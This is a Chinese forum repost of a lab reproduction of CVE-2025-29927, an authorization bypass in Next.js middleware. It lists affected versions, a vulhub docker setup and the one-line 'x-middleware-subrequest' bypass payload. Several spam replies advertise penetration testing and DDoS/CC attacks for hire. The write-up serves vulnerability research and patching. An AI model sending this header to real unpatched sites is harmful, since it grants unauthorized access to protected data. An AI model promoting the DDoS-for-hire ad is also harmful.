登录
/
注册
首页
论坛
其它
首页
科技
业界
安全
程序
广播
Follow
关于
导读
排行榜
资讯
发帖说明
登录
/
注册
账号
自动登录
找回密码
密码
登录
立即注册
搜索
搜索
关闭
CSDN热搜
程序园
精品问答
技术交流
资源下载
本版
帖子
用户
软件
问答
教程
代码
写记录
写博客
小组
VIP申请
VIP网盘
网盘
联系我们
发帖说明
道具
勋章
任务
淘帖
动态
分享
留言板
导读
设置
我的收藏
退出
腾讯QQ
微信登录
1
2
/ 2 页
下一页
返回列表
首页
›
业界区
›
科技
›
CVE-2025-29927 Next.js 中间件权限绕过漏洞复现 ...
CVE-2025-29927 Next.js 中间件权限绕过漏洞复现
[ 复制链接 ]
仲秀娟
2025-6-7 16:08:02
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
免责声明
本文所述漏洞复现方法仅供安全研究及授权测试使用;任何个人/组织须在合法合规前提下实施,严禁用于非法目的。作者不对任何滥用行为及后果负责,如发现新漏洞请及时联系厂商并遵循漏洞披露规则。
漏洞信息
Next.js 是一个基于 React 的流行 Web 应用框架,提供服务器端渲染、静态网站生成和集成路由系统等功能。包含众多功能,是深入研究复杂研究的完美游乐场。在信念、好奇心和韧性的推动下,我们出发去探索它鲜为人知的方面,寻找等待被发现的隐藏宝藏。
当使用中间件进行身份验证和授权时,Next.js 14.2.25 和 15.2.3 之前的版本存在授权绕过漏洞。
该漏洞允许攻击者通过操作 x-middleware-subrequest 请求头来绕过基于中间件的安全控制,从而可能获得对受保护资源和敏感数据的未授权访问。
补丁:
对于 Next.js 15.x,此问题已在 15.2.3 中修复
对于 Next.js 14.x,此问题已在 14.2.25 中修复
漏洞复现
vulhub已有环境:vulhub/next.js/CVE-2025-29927/README.zh-cn.md at master · vulhub/vulhub (github.com)
启动环境:
docker compose up -d
复制代码
访问虚拟机3000端口,可以看到环境搭建成功:http://your-ip:3000/login
访问根路径,显示需要登陆:
添加请求头,使用权限绕过payload
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
复制代码
访问成功,权限绕过漏洞复现成功
参考文章
Next.js 和损坏的中间件:授权工件 - zhero_web_security (zhero-web-sec.github.io)
vulhub/next.js/CVE-2025-29927/README.zh-cn.md at master · vulhub/vulhub (github.com)
CVE 2025 29927 Nextjs Auth Bypass - chestnut's blog (ch35tnut.com)
Next.js中间件授权绕过漏洞终极指南:CVE-2025-29927深度解析与防护策略 - 高效码农 (xugj520.cn)
Comparing v15.2.2...v15.2.3 · vercel/next.js (github.com)
代码审计知识星球 (zsxq.com)
本文作者CVE-柠檬i
CSDN:https://blog.csdn.net/weixin_49125123
博客园:https://www.cnblogs.com/CVE-Lemon
微信公众号:Lemon安全
来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
CVE
2025
29927
Next
js
相关帖子
物联网浏览器(IoTBrowser)-js开发人脸识别
读2025世界前沿技术发展报告24其他飞行器
读2025世界前沿技术发展报告25机载系统
读2025世界前沿技术发展报告27核力量
20252912 2024-2025-2 《网络攻防实践》实验四
在 React 项目中优雅实现新用户引导:HagiCode 的 driver.js 实践
20251904 2025-2026-2 《网络攻防实践》第二周作业
读2025世界前沿技术发展报告29海洋技术发展(上)
读2025世界前沿技术发展报告30海洋技术发展(下)
Bun.js探索超快全能工具链,为何被越来越多大厂及前端开发者使用
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
相关推荐
业界
物联网浏览器(IoTBrowser)-js开发人脸识别
0
565
计海龄
2026-03-27
安全
读2025世界前沿技术发展报告24其他飞行器
1
491
吕颐然
2026-03-27
安全
读2025世界前沿技术发展报告25机载系统
0
554
刃减胸
2026-03-28
安全
读2025世界前沿技术发展报告27核力量
0
740
狙兕
2026-03-30
业界
20252912 2024-2025-2 《网络攻防实践》实验四
1
264
剩鹄逅
2026-04-01
业界
在 React 项目中优雅实现新用户引导:HagiCode 的 driver.js 实践
0
432
浅皮懔
2026-04-01
安全
20251904 2025-2026-2 《网络攻防实践》第二周作业
1
50
洫伍俟
2026-04-01
安全
读2025世界前沿技术发展报告29海洋技术发展(上)
0
677
哎禹供
2026-04-02
安全
读2025世界前沿技术发展报告30海洋技术发展(下)
0
104
盛天欣
2026-04-03
业界
Bun.js探索超快全能工具链,为何被越来越多大厂及前端开发者使用
0
652
溶绚
2026-04-03
回复
(36)
届表
2025-11-2 16:47:48
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
这个好,看起来很实用
仲水悦
2025-12-13 17:44:59
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
过来提前占个楼
路逸思
2025-12-15 13:27:58
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
新版吗?好像是停更了吧。
扫恢怯
2026-1-5 05:16:04
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
感谢,下载保存了
虾氲叱
2026-1-12 17:00:56
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
鼓励转贴优秀软件安全工具和文档!
褥师此
2026-1-15 06:51:35
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
喜欢鼓捣这些软件,现在用得少,谢谢分享!
讲怔
2026-1-16 20:15:57
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
前排留名,哈哈哈
鄂缮输
2026-1-17 20:14:27
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
很好很强大 我过来先占个楼 待编辑
滥眩
2026-1-18 11:35:58
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
鼓励转贴优秀软件安全工具和文档!
注思
2026-1-18 12:35:58
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
谢谢分享,辛苦了
甘子萱
2026-1-18 20:54:38
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
懂技术并乐意极积无私分享的人越来越少。珍惜
判涔
2026-1-19 06:56:38
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
感谢,下载保存了
阮蓄
2026-1-20 01:29:07
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
不错,里面软件多更新就更好了
端木茵茵
2026-1-24 00:20:25
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
懂技术并乐意极积无私分享的人越来越少。珍惜
椎蕊
2026-1-26 06:36:12
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
鼓励转贴优秀软件安全工具和文档!
宿遘稠
2026-1-26 12:13:02
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
很好很强大 我过来先占个楼 待编辑
湄圳啸
2026-1-26 21:47:42
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
过来提前占个楼
咸和璧
2026-1-28 05:31:54
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
懂技术并乐意极积无私分享的人越来越少。珍惜
东门芳洲
2026-1-28 08:08:35
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
懂技术并乐意极积无私分享的人越来越少。珍惜
下一页 »
1
2
/ 2 页
下一页
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
回复
本版积分规则
回帖并转播
回帖后跳转到最后一页
签约作者
程序园优秀签约作者
发帖
仲秀娟
2026-1-28 08:08:35
关注
0
粉丝关注
21
主题发布
板块介绍填写区域,请于后台编辑
财富榜{圆}
3934307807
991125
anyue1937
9994892
kk14977
6845359
4
xiangqian
638210
5
神泱
9529
6
韶又彤
9911
7
荪俗
9023
8
宋子
9875
9
蓬森莉
9871
10
俞瑛瑶
10000
查看更多
今日好文热榜
175
【OpenClaw】通过 Nanobot 源码学习架构---
232
NCCL EP 论文解读
5
200 行 Python 代码,从零手搓极简 Agent,
3
200 行 Python 代码,从零手搓极简 Agent,
5
手把手教你用Python做本地AI聊天机器人最终
4
200 行 Python 代码,从零手搓极简 Agent,
370
200 行 Python 代码,从零手搓极简 Agent,
6
200 行 Python 代码,从零手搓极简 Agent,
5
手把手教你用Python做本地AI聊天机器人最终
3
200 行 Python 代码,从零手搓极简 Agent,
5
手把手教你用Python做本地AI聊天机器人最终
5
200 行 Python 代码,从零手搓极简 Agent,
6
手把手教你用Python做本地AI聊天机器人最终
780
手把手教你用Python做本地AI聊天机器人最终
5
200 行 Python 代码,从零手搓极简 Agent,
5
200 行 Python 代码,从零手搓极简 Agent,
5
手把手教你用Python做本地AI聊天机器人最终
5
200 行 Python 代码,从零手搓极简 Agent,
5
手把手教你用Python做本地AI聊天机器人最终
3
200 行 Python 代码,从零手搓极简 Agent,